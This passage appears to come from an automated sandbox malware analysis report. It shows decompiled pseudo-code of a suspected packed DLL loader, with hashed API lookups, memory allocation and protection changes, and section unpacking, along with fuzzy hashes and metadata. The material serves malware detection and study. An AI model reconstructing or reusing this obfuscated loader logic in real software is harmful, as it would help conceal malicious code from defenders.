                                				_t228 = _t320;
                                				if (_t228 != _t320) goto 0x640c3bc1;
                                				goto 0x640c3cb1;
                                				r9d = r9d ^ 0xecb028fc;
                                				E00000201201640CA8E8(r9d, _t228, _t314, __r9);
                                				if (_t228 == _t320) goto 0x640c3bb7;
                                				 *((long long*)(_t289 + 0x40)) = _t314;
                                				 *0x640cd440 = _t289;
                                				E00000201201640C908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t228 == _t320) goto 0x640c3bfc;
                                				 *_t228();
                                				goto 0x640c3bff;
                                				_t229 = _t320;
                                				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0x640c3c9d;
                                				E00000201201640C908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0x640c3c26;
                                				 *_t229();
                                				goto 0x640c3c29;
                                				E00000201201640C908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0x640c3c4b;
                                				r8d = r13d;
                                				 *_t229();
                                				goto 0x640c3c4e;
                                				if (_t320 != _t320) goto 0x640c3c6f;
                                				E00000201201640C908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 != _t320) goto 0x640c397d;
                                				goto 0x640c3cac;
                                				E00000201201640C908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0x640c3c8f;
                                				 *_t229();
                                				goto 0x640c3c92;
                                				if (r13d != r13d) goto 0x640c3cc0;
                                				goto 0x640c3c57;
                                				asm("lock add dword [esi+0x38], 0x1");
                                				if (E00000201201640C9D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0x640c3cc0;
                                				E00000201201640C6CE4(_t229, _t230, _t289, _t320, _t292);
                                				goto 0x640c3cc0;
                                				return 8;
                                			}







































                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                                • String ID:
                                • API String ID: 2248784776-0
                                • Opcode ID: d8c896fb4c5f19e360938b71e439c2f71d6688fd5b8e83448aeef5f05ba6c7cf
                                • Instruction ID: acf4623f4be389d287bc2ae7fd822423cf283225cec474105ea2f4268f916278
                                • Opcode Fuzzy Hash: d8c896fb4c5f19e360938b71e439c2f71d6688fd5b8e83448aeef5f05ba6c7cf
                                • Instruction Fuzzy Hash: 16D1C425320760D7EA609761E88E3EE6359F788788F500411FF4E47B9BDE3AD4B98308
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: File$CreateDirectoryErrorLastQuery
                                • String ID:
                                • API String ID: 2967190759-0
                                • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction ID: 448d1cc3037f81d1e21f368a9e7d0d0d291ce2c8f67b14eeb9d49a880cd15188
                                • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction Fuzzy Hash: FF41D0323047A0CBEB508B52E84939D62A4F7CC790F284525EF9D43BCACF3AD8258B14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 60%
                                			E00007FFC7FFC130E6D50(intOrPtr __ecx, void* __rax, void* __rcx, signed int* __rdx, long long __rsi, void* __r8) {
                                				void* __rbx;
                                				void* __r13;
                                				signed int _t112;
                                				signed int _t117;
                                				signed int _t153;
                                				signed int _t161;
                                				signed int _t169;
                                				signed int _t176;
                                				signed int _t183;
                                				long long _t184;
                                				void* _t186;
                                				void* _t190;
                                				void* _t194;
                                				void* _t196;
                                				void* _t197;
                                				void* _t201;
                                				signed int* _t202;
                                				void* _t203;
                                				void* _t206;
                                				long _t208;
                                				void* _t211;
                                
                                				_t199 = __r8;
                                				_t186 = __rcx;
                                				 *((long long*)(_t196 + 0x10)) = __rdx;
                                				 *((intOrPtr*)(_t196 + 8)) = __ecx;
                                				_push(_t184);
                                				_push(_t194);
                                				_push(_t190);
                                				_push(_t206);
                                				_t197 = _t196 - 0x90;
                                				_t176 =  *(_t197 + 0x130);
                                				r11d = r9d;
                                				r10d = __rax - 0x16de;
                                				 *((intOrPtr*)(_t197 + 0xe8)) = __rcx + 0x114f;
                                				r13d = __rax - 0x37e1;
                                				 *(_t197 + 0x130) = r10d;
                                				r15d = _t190 - 0x23f6;
                                				 *(_t197 + 0x80) = _t194 + 0x17b;
                                				r8d = _t211 + 0x3a59;
                                				r12d = __rcx - 0x165d;
                                				 *(_t197 + 0x100) = r12d;
                                				r9d = __rcx - 0x1351;
                                				if ( *(_t197 + 0x100) + 0xffffec15 - r8d >= 0) goto 0x130e6e2c;
                                				_t183 = __rdx[0x34];
                                				r8d = 0x3000;
                                				_t21 = _t186 + 0x40; // 0x40
                                				r9d = _t21;
                                				_t153 =  *((intOrPtr*)(_t183 + 0x50)) + 0x00000fff & 0xfffff000;
                                				__rdx[0x64] = _t153;
                                				VirtualAlloc(_t211, _t208); // executed
                                				__rdx[0x30] = _t183;
                                				goto 0x130e710b;
                                				r10d =  *__rdx;
                                				r8d = __rdx[0x50];
                                				r10d = r10d | _t153;
                                				r8d = r8d + __rdx[0x6c];
                                				r8d = r8d ^ 0x00002598;
                                				r10d = r10d +  *__rdx;
                                				 *(_t197 + 0x50) = __rdx[0x36] + __rdx[0x40] ^ 0x00003a59;
                                				 *((long long*)(_t197 + 0xe0)) = __rsi;
                                				r11d = r9d;
                                				r11d = r11d - __rdx[0x18];
                                				r11d = r11d + 0x38e9;
                                				r9d = r15d;
                                				 *(_t197 + 0x48) = __rdx[0x66] * r9d & r9d;
                                				r9d = r9d & _t176;
                                				 *(_t197 + 0x40) = r8d;
                                				 *(_t197 + 0x38) = r10d;
                                				r8d =  *(_t197 + 0xf0) + 0x00000d93 | __rdx[0x12];
                                				 *(_t197 + 0x30) = r11d;
                                				 *(_t197 + 0x28) = (__rdx[0x88] & r10d) - 0x38e9;
                                				 *(_t197 + 0x20) = __rdx[0x70] ^ _t153;
                                				_t112 = E00007FFC7FFC130E2A70(_t184, __rcx, __rdx, __r8, _t203);
                                				r9d = _t211 - 0x3666;
                                				r9d = r9d ^ 0x000037e1;
                                				r10d = __rdx[0x54];
                                				r10d = r10d + 0x343a;
                                				r11d = __rdx[0x48];
                                				r11d = r11d ^ 0x00001f2c;
                                				 *(_t197 + 0xf0) = _t112;
                                				r13d = r13d - r12d;
                                				r8d = _t194 - 0x37e1;
                                				 *(_t197 + 0x48) = __rdx[0x68] & __rdx[0x50] & 0x0000228c;
                                				 *(_t197 + 0x40) = __rdx;
                                				 *(_t197 + 0x38) = r10d;
                                				 *(_t197 + 0x30) = r11d;
                                				 *(_t197 + 0x28) = (__rdx[0x62] | __rdx[0x8a]) ^ _t176;
                                				 *(_t197 + 0x20) =  *__rdx ^ r13d ^ 0x00002598;
                                				r12d = E00007FFC7FFC130F98F0(r13d, _t183, __rdx, _t199, _t201, _t206);
                                				r15d = __rdx[0x32];
                                				_t117 = __rdx[0x62];
                                				r15d = r15d ^ __rdx[0x48];
                                				r13d = __rdx[0x6c];
                                				_t169 = __rdx[0x4c];
                                				_t202 =  *((intOrPtr*)(_t197 + 0xd8));
                                				r14d = __rdx[0x54];
                                				r14d = r14d | _t117;
                                				r8d =  *_t202;
                                				r8d = r8d + _t202[0x38];
                                				r11d = _t202[0x1e];
                                				r10d = _t202[0x8a];
                                				_t161 =  *(_t197 + 0xf0);
                                				r10d = r10d - 0x3666;
                                				r8d = r8d | _t161;
                                				r13d = r13d | 0x000027b2;
                                				r13d = r13d - _t202[0x24];
                                				_t189 =  *((intOrPtr*)(_t197 + 0xd8));
                                				r11d = r11d |  *(_t197 + 0x80);
                                				r11d = r11d +  *((intOrPtr*)(_t197 + 0xe8));
                                				 *(_t197 + 0x78) = r15d;
                                				 *(_t197 + 0x70) = r14d;
                                				 *(_t197 + 0x68) = _t186 + __rdx & _t202[0x16];
                                				 *((intOrPtr*)(_t197 + 0x60)) = _t202[0x44] + 0x38e9 + r13d;
                                				 *(_t197 + 0xf0) = _t117 ^  *(_t197 + 0x80);
                                				 *(_t197 + 0xd0) = ( *(_t197 + 0xd0) - _t161 + 0xea2) * _t169;
                                				r9d =  *(_t197 + 0x110);
                                				r12d =  *(_t197 + 0x100);
                                				r9d = r9d + 0xffffe749;
                                				r9d = r9d ^ _t169;
                                				r12d = r12d | 0x000038e9;
                                				r9d = r9d |  *( *((intOrPtr*)(_t197 + 0xd8)) + 0x100);
                                				 *(_t197 + 0x58) =  *(_t197 + 0xd0);
                                				 *(_t197 + 0x50) =  *(_t197 + 0x130) + _t202[0x72] ^ 0x0000343a;
                                				 *(_t197 + 0x48) = r11d;
                                				 *(_t197 + 0x40) = r10d;
                                				r10d =  *(_t197 + 0xf0);
                                				 *(_t197 + 0x38) = r10d;
                                				 *(_t197 + 0x30) = r13d;
                                				 *(_t197 + 0x28) = r8d;
                                				 *(_t197 + 0x20) = _t202[0x74] ^  *(_t197 + 0x130);
                                				E00007FFC7FFC130FA750(_t183, _t186,  *((intOrPtr*)(_t197 + 0xd8)), _t189, _t202);
                                				return  *((intOrPtr*)(_t197 + 0xe8)) + 0xffffeba5;
                                 			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                                • Instruction ID: 6a52ef302f8d0ada13a76ef666c9e59bc3bdeddbfdec42d790b2c44045eca038
                                • Opcode Fuzzy Hash: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                                • Instruction Fuzzy Hash: BE914AB36186D48BD325CF19E448B9EBBA4F788788F114129EF8957B58C738EA51CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 59%
                                			E00007FFC7FFC130E5840(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, long long _a8, signed int _a24, intOrPtr _a32, long long _a40, intOrPtr _a48, signed int _a64, signed int _a80) {
                                				signed int _v60;
                                				signed int _v64;
                                				signed int _v68;
                                				signed int _v72;
                                				intOrPtr _v88;
                                				intOrPtr _v96;
                                				signed int _v104;
                                				signed int _v112;
                                				signed int _v120;
                                				signed int _v128;
                                				signed int _v136;
                                				signed int _v144;
                                				signed int _v152;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* __r12;
                                				signed int _t132;
                                				intOrPtr _t139;
                                				signed int _t144;
                                				signed int _t148;
                                				signed int _t157;
                                				signed int _t174;
                                				intOrPtr _t176;
                                				signed int _t182;
                                				signed int _t183;
                                				void* _t194;
                                				void* _t197;
                                				long long _t216;
                                				long long _t241;
                                				void* _t242;
                                				void* _t243;
                                				void* _t247;
                                				void* _t251;
                                				void* _t253;
                                				void* _t254;
                                				void* _t255;
                                				void* _t256;
                                				void* _t257;
                                				void* _t258;
                                
                                				_t251 = __r9;
                                				_t247 = __r8;
                                				_a8 = __rbx;
                                				r8d = r8d + 0xffffea1c;
                                				r12d = _a80;
                                				r12d = r12d + 0x3c4;
                                				_a48 = __r9 - 0x22c;
                                				_t182 = __rax - 0x27ae;
                                				_v64 = r8d;
                                				r9d = __rax - 0x6ab;
                                				_a24 = _t182;
                                				_a64 = r9d;
                                				r13d = __rcx + 0x18b7;
                                				r14d = __rcx - 0x2032;
                                				r15d = __rcx - 0x106;
                                				if (r13d - __rdx - 0x365 <= 0) goto 0x130e597a;
                                				_t177 = __r9 + 0xfd2;
                                				_v88 = _t242 + 0x3666;
                                				r10d = _t242 + 0x2598;
                                				r11d = _t257 + 0x3595;
                                				_t183 = _t182 + 0x37e1;
                                				r14d = r14d + 0x23f6;
                                				_v96 = _t256 - 0x760;
                                				_t154 = __r8 + 0x495;
                                				r8d = _a64;
                                				r9d = _t258 + 0x1b2d;
                                				_v104 = r10d;
                                				_v112 = r11d;
                                				_v120 = __r9 + 0x17e6;
                                				_v128 = __r9 + 0xfd2;
                                				_t241 = _a40;
                                				_v136 = _t183;
                                				_v144 = __r9 + 0x1492;
                                				_v152 = r14d;
                                				E00007FFC7FFC130E6D50(__r8 + 0x495, __rax, __rcx, _t241, _t242, __r8); // executed
                                				r8d =  *(_t241 + 0x190);
                                				E00007FFC7FFC130EC440(_t154, 0, _t177, _t194,  *((intOrPtr*)(_t241 + 0xc0)), _t241, _t241, _t247);
                                				goto 0x130e5ca3;
                                				_t216 = _a40;
                                				if ( *((intOrPtr*)(_t216 + 0x140)) -  *((intOrPtr*)(_t216 + 0x228)) - 0x37e1 >= 0) goto 0x130e59d0;
                                				_t197 = _t183 - r12d - r13d;
                                				if (_t197 > 0) goto 0x130e59d0;
                                				r8d = r12d;
                                				r8d = r8d & 0x00002032;
                                				asm("o16 nop [eax+eax]");
                                				if (_t197 != 0) goto 0x130e59c0;
                                				 *(_t216 + 0x1b0) =  *(_t216 + 0x1b0) - _t247;
                                				if ( *(_t216 + 0x1b0) -  *(_t216 + 0x1f0) * r12d > 0) goto 0x130e5c9c;
                                				_a32 = _t183;
                                				if (_t183 - r14d -  *((intOrPtr*)(_t216 + 0x120)) <= 0) goto 0x130e5c71;
                                				_t132 = _t251 + 0x2598;
                                				_a80 = _t132;
                                				if ( *_t216 - ( *(_t216 + 0x1c0) | _t132) <= 0) goto 0x130e5c4a;
                                				r11d = _t258 + _t257;
                                				r10d = r14d;
                                				r10d = r10d * r14d;
                                				_v72 = r15d & 0x00002032;
                                				_v68 = r12d & r13d;
                                				_v60 = r10d;
                                				r11d =  *(_t216 + 0x48);
                                				r9d =  *(_t216 + 0x188);
                                				r11d = r11d ^ r14d;
                                				r8d =  *(_t216 + 0x40);
                                				r11d = r11d + r14d;
                                				r10d = r10d - _a48;
                                				r9d = r9d *  *(_t216 + 0x1b0);
                                				_v104 =  *(_t216 + 0x90) | 0x00002598;
                                				r8d = r8d + r12d;
                                				_v112 =  *((intOrPtr*)(_t216 + 0x130)) + 0x2032;
                                				_v120 = r11d;
                                				_v128 = 0;
                                				_v136 =  *(_t216 + 0x1c0) ^ r11d;
                                				_v144 = r10d;
                                				_v152 =  *(_t216 + 0xa8) & 0x00000d20 | 0x0000120c;
                                				_t139 = E00007FFC7FFC130E2A70(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t132, _t253);
                                				_t157 = _a24;
                                				r9d =  *(_t216 + 0x10);
                                				r10d =  *(_t216 + 0x188);
                                				r9d = r9d | 0x00002103;
                                				r8d =  *(_t216 + 0x60);
                                				r9d = r9d + _t157;
                                				_a48 = _t139;
                                				r10d = r10d | 0x000027ae;
                                				r8d = r8d & _t157;
                                				_v120 = _a64 ^ 0x000027b2;
                                				_v128 = _v72;
                                				_v136 = _v68;
                                				_v144 = r10d;
                                				_v152 = r9d;
                                				_t144 = E00007FFC7FFC130E6820(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t243, _t216, _t253, _t254, _t255);
                                				r8d =  *(_t216 + 0x90);
                                				r8d = r8d ^ r15d;
                                				r9d =  *(_t216 + 0x1b8);
                                				r8d = r8d | r15d;
                                				r11d =  *(_t216 + 0x1a0);
                                				r11d = r11d + 0x27ae;
                                				r11d = r11d ^ 0x0000343a;
                                				_v112 =  *(_t216 + 0x188) * _v64;
                                				_a24 = _t144;
                                				r9d = r9d * r14d;
                                				_v120 = ( *(_t216 + 0x60) | r13d) ^  *(_t216 + 0x40);
                                				_v128 = r8d;
                                				_v136 = (r15d | r12d) ^ 0x000027ae;
                                				r9d = r9d ^ _a64;
                                				_v144 = r11d;
                                				_v152 =  *(_t216 + 0x40) * 0x00002598 ^  *(_t216 + 0x1f8);
                                				_t148 = E00007FFC7FFC130FF6B0(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t242, _t243, _t216, _t216, _t253);
                                				r11d = _t258 + _t257;
                                				_t174 = _a80 + 3;
                                				r10d = _v60;
                                				_a64 = _t148;
                                				_a80 = _t174;
                                				if (_t174 - ( *(_t216 + 0x1c0) | _t148 + 0x00002598) > 0) goto 0x130e5a70;
                                				_t176 = _a32 + 4;
                                				_a32 = _t176;
                                				if (_t176 - r14d -  *((intOrPtr*)(_t216 + 0x120)) > 0) goto 0x130e5a20;
                                				if (_a24 -  *(_t216 + 0x10) - 0x329d <= 0) goto 0x130e5c9c;
                                				 *(_t216 + 0x48) =  *(_t216 + 0x48) + ( *(_t216 + 0x150) | 0x0000343a) + r13d;
                                				return _t256 + 0x13da;
                                 			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 89a4817951f1a13eee29f1b2b0a9b082e15d1f6d6768b930f3d990648e2eeefa
                                • Instruction ID: 430cfcb0d18a56a132fe9c6796830629c4d45471cbb6bd9b00af134c3236fcd6
                                • Opcode Fuzzy Hash: 89a4817951f1a13eee29f1b2b0a9b082e15d1f6d6768b930f3d990648e2eeefa
                                • Instruction Fuzzy Hash: DDB19B736186D5CBD720CF24E044BAABBA4F788B88F144536DB8967B58DB38E954CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00007FFC7FFC130EB3A0(void* __edx) {
                                				void* _t5;
                                
                                				_t5 = __edx;
                                				if (_t5 == 0) goto 0x130eb3e1;
                                				if (_t5 == 0) goto 0x130eb3d5;
                                				if (_t5 == 0) goto 0x130eb3c8;
                                				if (__edx == 1) goto 0x130eb3c1;
                                				return 1;
                                 			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                • String ID:
                                • API String ID: 3885183344-0
                                • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction ID: 16b6b08da8b7b05c29702a84e49a71bc7655186e0b7c35f39b35c38ddf256081
                                • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction Fuzzy Hash: 39519E21F0CE6F85FA24AB66A4422B926E0AF543ACF644031E54D377E7DE2CE465C734
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 48%
                                			E00000201201640C4DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
                                				intOrPtr _t22;
                                				intOrPtr _t23;
                                				void* _t30;
                                				long long _t55;
                                				void* _t71;
                                				intOrPtr* _t74;
                                				intOrPtr* _t75;
                                				long long _t81;
                                				long long _t82;
                                				long long _t84;
                                				void* _t90;
                                				long _t92;
                                				long _t94;
                                				long _t96;
                                
                                				_t90 = __r9;
                                				_t55 = _t84;
                                				 *((long long*)(_t55 + 8)) = __rbx;
                                				 *((long long*)(_t55 + 0x10)) = _t81;
                                				 *((long long*)(_t55 + 0x18)) = __rsi;
                                				 *((long long*)(_t55 + 0x20)) = __rdi;
                                				_t82 = __rcx;
                                				r8d = 0;
                                				HeapCreate(_t96, _t94, _t92); // executed
                                				if (_t55 == 0) goto 0x640c4f03;
                                				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                                				_t74 = _t55 + _t71 + 0x68;
                                				_t22 =  *_t74;
                                				if (_t22 == 0) goto 0x640c4e94;
                                				if (_t22 == 0x7373622e) goto 0x640c4e22;
                                				_t75 = _t74 + 0x28;
                                				_t23 =  *_t75;
                                				if (_t23 != 0) goto 0x640c4e11;
                                				if (_t23 == 0) goto 0x640c4e94;
                                				r13d =  *(_t75 + 0x10);
                                				r12d =  *(_t75 + 0x14);
                                				r12d = r12d ^  *(_t71 + 8);
                                				r12d = r12d ^ r13d;
                                				HeapAlloc(??, ??, ??);
                                				if (_t55 == 0) goto 0x640c4e8d;
                                				r9d = r12d;
                                				r8d = r13d;
                                				E00000201201640C111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
                                				r11d =  *((intOrPtr*)(_t75 + 0xc));
                                				 *0x640cd448 = _t55 - __r11 - _t82;
                                				 *0x640cd450 = E00000201201640C16FC(_t55, _t55 - __r11 - _t82 + 0x640d1040);
                                				goto 0x640c4e99;
                                				goto 0x640c4e99;
                                				if (2 == 0) goto 0x640c4ea8;
                                				HeapDestroy(??);
                                				goto 0x640c4f03;
                                				HeapAlloc(??, ??, ??);
                                				if (0x640d1040 != 0) goto 0x640c4ee1;
                                				HeapDestroy(??);
                                				goto 0x640c4f03;
                                				E00000201201640C487A();
                                				 *0x201640D1048 = _t55;
                                				 *0x640cd458 = 0x640d1040; // executed
                                				_t30 = E00000201201640C37E0(0x640d1040, _t82, _t90); // executed
                                				return _t30;
                                			}


















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$AllocDestroy$Create
                                • String ID: .bss
                                • API String ID: 388876957-3890483948
                                • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction ID: 5062e316b5a0475a1b40b4a6314e4781af67b9c39a31fccc1009d8affa039997
                                • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction Fuzzy Hash: F441AD31304760D7EB14CB52AD4A39967A8F788B94F158024EF4947B8ADF79E866C308
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130F7C20(long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, signed int __r9) {
                                				void* __rdi;
                                				signed int _t150;
                                				void* _t153;
                                				signed int _t154;
                                				void* _t156;
                                				signed int _t157;
                                				signed long long _t192;
                                				signed long long _t210;
                                				signed long long _t228;
                                				void* _t229;
                                				intOrPtr _t230;
                                				long long _t234;
                                				long long* _t235;
                                				void* _t237;
                                				void* _t238;
                                				signed long long _t242;
                                				intOrPtr* _t248;
                                				signed long long _t250;
                                				signed int _t251;
                                				void* _t252;
                                				long _t254;
                                				void* _t256;
                                				long _t258;
                                				void* _t260;
                                
                                				_t252 = _t237;
                                				 *((long long*)(_t252 + 8)) = __rbx;
                                				 *((long long*)(_t252 + 0x10)) = _t234;
                                				 *((long long*)(_t252 + 0x18)) = __rsi;
                                				_t238 = _t237 - 0x60;
                                				r14d = __rcx - 0x2103;
                                				r12d = __r8 + 0xd1;
                                				r15d =  *(_t238 + 0xd8);
                                				_t153 =  *(_t238 + 0xd0) + 0xfffff9ee;
                                				_t156 = __rdx + 0xeb4;
                                				r15d = r15d + 0x1249;
                                				r13d = __rdx - 0x27b2;
                                				r8d = r8d + 0x152;
                                				if (_t156 - _t258 + 0x329d < 0) goto 0x130f7f40;
                                				if (r14d == _t156) goto 0x130f7f24;
                                				if ( *((long long*)(__r9 + 0x2f8)) == 0) goto 0x130f7e1e;
                                				 *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) +  *(__r9 + 0x90) - 0x3a59;
                                				_t235 =  *((intOrPtr*)(__r9 + 0x2f8));
                                				 *((long long*)(__r9 + 0x48)) = 0x84ef49a;
                                				r8d =  *( *((intOrPtr*)(__r9)) + 0x130);
                                				r8d = r8d ^ 0x000023f3; // executed
                                				if (VirtualProtect(_t260, _t258) != 0) goto 0x130f7d2b;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x188)) + 0x259 - 0x3595 < 0) goto 0x130f7d2b;
                                				 *(__r9 + 0x90) =  *(__r9 + 0x90) ^ __r9 + 0x000001c0;
                                				if ( *( *((intOrPtr*)(__r9 + 0x1c8)) + 0x60) * 0xc3622d03 - 0x30d5 <= 0) goto 0x130f7d6a;
                                				_t242 =  *(__r9 + 0x228) ^ 0x00001f2c;
                                				 *(__r9 + 0x120) = _t242;
                                				if (0x30d6 - _t235 < 0) goto 0x130f7d51;
                                				_t210 =  *((intOrPtr*)(__r9));
                                				_t248 = _t238 + 0xd0;
                                				 *((intOrPtr*)(_t210 + 0x198)) =  *((intOrPtr*)(_t210 + 0x198)) +  *((intOrPtr*)(__r9 + 0x70)) + 0x2032;
                                				 *((long long*)(_t235 + 8)) =  *((intOrPtr*)(__r9 + 0xc0));
                                				 *((intOrPtr*)(_t235 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0x50));
                                				 *((long long*)(__r9 + 0x28)) = __r9 + 0x1b0;
                                				r8d =  *( *((intOrPtr*)(__r9 + 0x118)) + 0x88 + _t210 * 8);
                                				 *_t235 = _t242 +  *((intOrPtr*)(__r9 + 0xc0));
                                				 *((long long*)(__r9 + 0xa0)) = 0x6dce;
                                				 *((intOrPtr*)(_t235 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0xa4));
                                				 *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) =  *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) |  *(__r9 + 0x198) + 0x0000329d;
                                				r8d =  *(_t238 + 0xd0);
                                				VirtualProtect(_t256, _t254);
                                				if (_t153 - _t229 + 0x30d5 < 0) goto 0x130f803b;
                                				r14d = r14d + 0x30d5;
                                				 *((long long*)(__r9 + 0x158)) =  *((intOrPtr*)(__r9 + 0x88));
                                				 *((long long*)(__r9 + 0x298)) = _t235 +  *((intOrPtr*)(__r9 + 0xc0));
                                				 *((long long*)(__r9 + 0x10)) = 0x2598;
                                				 *(__r9 + 0x198) =  *(__r9 + 0x198) * 0xed7e2e8;
                                				_t230 =  *((intOrPtr*)(__r9 + 0x158));
                                				if (_t230 == 0) goto 0x130f7eac;
                                				_t192 =  *(__r9 + 0x1e0) | 0x0000228c;
                                				 *(__r9 + 0x198) = _t192;
                                				GetProcessHeap();
                                				if (_t192 == 0) goto 0x130f7eac;
                                				HeapFree(??, ??, ??); // executed
                                				r8d =  *(_t238 + 0xd8);
                                				 *((intOrPtr*)(_t238 + 0x50)) = _t254 + 0x81;
                                				r10d = _t256 + 0x2032;
                                				 *(_t238 + 0x48) = r10d;
